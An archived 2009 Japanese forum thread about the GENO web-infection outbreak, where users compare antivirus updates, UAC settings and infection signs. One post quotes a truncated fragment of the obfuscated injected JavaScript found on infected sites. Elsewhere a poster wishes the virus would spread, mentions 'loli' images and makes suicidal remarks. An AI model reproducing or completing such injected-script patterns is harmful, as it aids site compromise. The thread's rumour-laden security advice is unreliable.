204 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございます
けど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。日曜出動までして何してんだろ俺？もう帰宅します。明日上司になんて説明しようか？
995 名前： ヒマラヤユキノシタ(コネチカット州)[] 投稿日：2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。
144 名前： ケンタウレア・モンタナ(コネチカット州)[] 投稿日：2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ
940 名前： ミツマタ(東京都)[] 投稿日：2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
55 名前： ミツマタ(東京都)[] 投稿日：2009/04/06(月) 18:35:10.80 ID:AhXwTJEf
釣りだと思われるのはしゃくなので
IEの強制終了のせいで発注できず
ウイルスの原因が２CHでエロZIｐ
PCと自前のHDD回収される
生き恥をさらす
大量のロリ画像で性犯罪者扱い
どぷするの？と上司
自主退社←今ここ
このスレに気づかずに管理人に連絡とったのが悔やまれる

ええと、例の乙女ゲーのＵＲＬをチェッカーに放り込んだんだが、
<script language=javascript><!--
(function(){var goC='%';var xouq='<76<61<72<20a<3d<22<53<63<...
って感じで意味不明な値がずっと続いてる場合感染してる、でおｋ？

>>901
まず社会人としてアウトだろ

>>903
人生が終わるわけでもなかろうに
個人情報は抜き取られるけど

>>903
げんじつとうひという希望がある

>>901
かなりヤバイかもね〜
・・・と会社のPCから書き込んでみる

>>901
たぶんPCの管理者が死ぬ

基本的にセキュ板は

トイレのドアノブにばい菌があるからハンカチ使って空けるような潔癖症のキチガイの集まりだから

一般の人は

FlashとReaderを最新版に

これだけでいいよ

無駄に不安煽るのが

ここのクズどもだから

sqlsodbc.chmってファイル何なの？
拡張子はヘルプ関係らしいが・・・
消しちゃダメかな？

>>909
よし明日にでも教えるわ

もう900超えたのか・・・

>>734
Adobe Flash Playerを使わない
も追加しないとマズイのでは？

>>916
なんでそんな必死なん

>>905
どうやったら無効にできるかわからないし
そもそも今現在有効なのかすらわからない…
どこを見たらいいの？

ノートン更新来た
GENO対応したか？

>>922
ええーそんなレベルでネットやってるんですかぁー

セキュ板民を煽ってるのにセキュ板で書き込みしてるやつって馬鹿なの？

ウイルスバスターの更新はまだか？

>>681
この状態で一週間後？想像したくもないわ

>>916
とかなんとか言いながら、自分はしっかりと
マスクと食品備蓄して対策しているんだろ！

>>922
知らないんならいじってないってことだろ

しばらくネットは携帯からだな…

>>926
>>●３６５日、毎日９：００〜２４：００まで対応！
（#｀ハ´）答えは全て「ｻｲｲﾝｽﾄｰﾙｽﾙ ｱﾙ」

>>●パソコン、メール、周辺機器などの面倒な設定、変更をサポート！
（#｀ハ´）VB不具合無いアル、不具合周辺機器せいアル。周辺機器メーカーへ問い合わせるアル

>>●パソコン、メール、インターネット関連のトラブルに対応！
（#｀ハ´）VB不具合無いアル、お使いのパソコンメーカー、プロバイダーに問い合わせるアル

>>●パソコン、アプリケーション、周辺機器など基本的な操作方法をサポート！
（#｀ハ´）VB不具合無いアルから、お使いのパソコンメーカーに問い合わせるアル

>>●ハードウェアの故障の場合は、トラブルを切り分けし、メーカサポートをご案内
（#｀ハ´）切り分ける能力無いアル。VB不具合全部ハードのせいアルネ

>>●電話でわからない場合は、リモート（遠隔操作）で対応も！！で解決！！
（#｀ハ´）msconfigでスタートアップ・サービス全止め→再起動、なおらなければｻｲｲﾝｽﾄｰﾙ ｱﾙ

>>922
そんな状態なら無効にして無いのかもな

Norton先生はさっきからひっきりなしに更新してるわ

>>926
まだ来てないっぽい

>>922
おまｗ
UACでググれよ

このスレ以外インターネットのどこでも盛り上がってないけど、
これって達の悪いジョークとかじゃないの？？？

>>905
凄いなそれ。OS標準の保護を無効にさせるアプリケーションかよ。
UACがそういうアプリを駆逐してくれるはずなんだがなあ。

>>916
まあまあ、別にハンカチでドアノブ掴んだっていいじゃねえか。
キレイ好きなのは悪いことじゃないだろ。とりあえず手洗わない奴多すぎだし。

>>917
sqlsodbc.chmが改変されるのはウィルスがバージョンチェックの目印にしてるだけっぽいから
既に感染していたり他の所にチェックを入れるウィルスの亜種だと意味無いのでは？

live one careはのんびりやで〜

>>936
このスレよりもっと盛り上がってるところが別にあるけどね。

ファミ

>>924
すいません

>>929
そういうものなんですか
たまに盾みたいなアイコンが出るあれがそうですか？

>>934
そう…ありがとう…なんか辛いよ…

>>936
おまえのインターネットって、ずいぶん狭い世界なんだな

我らがavastさんはまだか！

>>907
アメリカいったら発狂するぞｗ

>>941
途中送信しちまった
ファミ通も感染したらしいしやばいな

>>905
JaneStyle使いは負け組みｹﾃｰｲ

>>936
じゃあ感染URL踏んでらっしゃい

ノートンのさっきの更新がこれに対応したものなのかどうか
試そうにも違ったら困るので試せないｗ

>>945
なんかavast!さん結構前から入ってるとか聞いたけど

一回でもいいのでTVで報道してくれないものか

>>947
スレ嫁よ
確認した奴が感染してないっていってるだろ

>>947
してませんが

>>936
ジョークなら良かったのにね
つかJaneの作者UAC切れとか言ってたんだ
気づかなかったけどVistaで普通に使えてたw
あー気づかなくて良かったあああ

>>947
それデマ

カスペ更新キタ

先生ならあるいはまた日付だけの更新やもしれぬ・・・！

お？　ノートンまた更新ｷﾀのか
でも概略じゃ内容がサッパリわからないぜ

先生更新きたけど、これ関連の更新なのかがわかんねぇｗ

>>950
さっきの・・・？

先生が真の力を発揮するのは再起動を要求する時だけ

>>715
うしろ薄暗くなって許可かキャンセルかの警告出る。
ソフトによってはUACの所為で起動時糞重くなったり（韓国製FPSとかでよくある）するから切ってる奴多数

そういえば感染するとうｐだてがブロックされるとか何とかいってなかったっけ

>>937
どうやらJaneStyleは設定ファイルの保存場所までProgramFilesの中でやっちゃって動作に仕様が出るらしい。
Vistaが出た当初から言われてんだが今日までずっと対策してない。
最近アップデートされたんだがやったのはアフィリンクとYahooツールバーの強制添付だけ。

>>962
うん、Genoにまともに対応できるとしたらエンジンのアップデート必須
だろうね。

>>910
アウアウだな

>>963
それですか
じゃあうちのPCはオンになってるんですねUAC

>>965
企業になったらやっぱりお金稼ぎがメインになるのね

先生の普段のうｐだてって何をしてるのか分からん

企業まで感染するって
PCにセキュリティ対策ソフトって普通入れるもんじゃないの？

Vistaの軽量化対策→UACをOFF

>>970
ちゃんと使ってくれてるかの生存確認です
先生自体は死んだままだけどな！

この流れ見てるとやっぱUACがデフォルトで有効だったのは大正解だと思うわ。

>>965
JaneStyleの開発力マジパネェ金の亡(ry

とにかくGENOのやつらはマジで首吊れ！

>>971
対策される前に入ったらアウトだろ。つまりそういうことだったんじゃね

>>965
そうだったのか…
その発言今知った
知らなくてよかった

>>971
このスレちゃんと読んだか？

>>971
カカクコム事件とか知らないの？　馬鹿なの？

普段見てるサイトが感染してたら終わりじゃんかよ

誰か、次スレヨロシク
立てられなかった

>>971
小さい企業だとパソコン買ったまま使い続けている場合も多いよ。
対策ソフトの期限切れアラートが出っ放しとかよくある。

ウイルス対策ソフトが重いときの回避策でオフで切り抜けるってのも駄目だ

avast入れてたら自前に対策できてただろうね

とりあえず現在対応してるソフトまとめようず！

ノートン定義ファイルのところに更新したってのってねえぞ。

どうやってサイトが改ざんされるの？
FTPパス抜かれてうんぬん？

バスター厨か？

>>981
テンプレこのままでいいのかな？
それだったらこのまま立ててくるし

Style使ってるけど、設定とか全部同じフォルダの中だぞ
古いアーカイブからうｐして使ってるからかな

UACはNorton UAC Toolってのが使いやすいらしい

>>971
まともな企業は導入しているソフトウェアのバージョンなども含めて、
セキュリティに十分な対策を講じていますが、問題はそのような企業が(ry

>>987
そう

>>910
995までに立たなかったら立ててくる

>>951
最新の亜種に対策ってされたっけavast

>>938
>>他の所にチェックを入れるウィルスの亜種
もうそんなものが・・・
nLiteでいろいろいじったXPのせいか
sqlsodbc.chmが最初から存在しないんだけど
安心はできないのね

>>989
このスレの間では気になるところはチラホラとあったけど
基本的には特に変化は無かったはず
よろしく！

先生目覚めてくれ・・・

>>990
元々レジストリとか使わないから適当なフォルダに突っ込んでも問題無いんだよな
それをわざわざシステムフォルダへ入れようとするんだから頭悪い

次スレ
GENOウイルススレ　★9
http://pc11.2ch.net/test/read.cgi/sec/1242489450/

1000ならネット壊滅

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。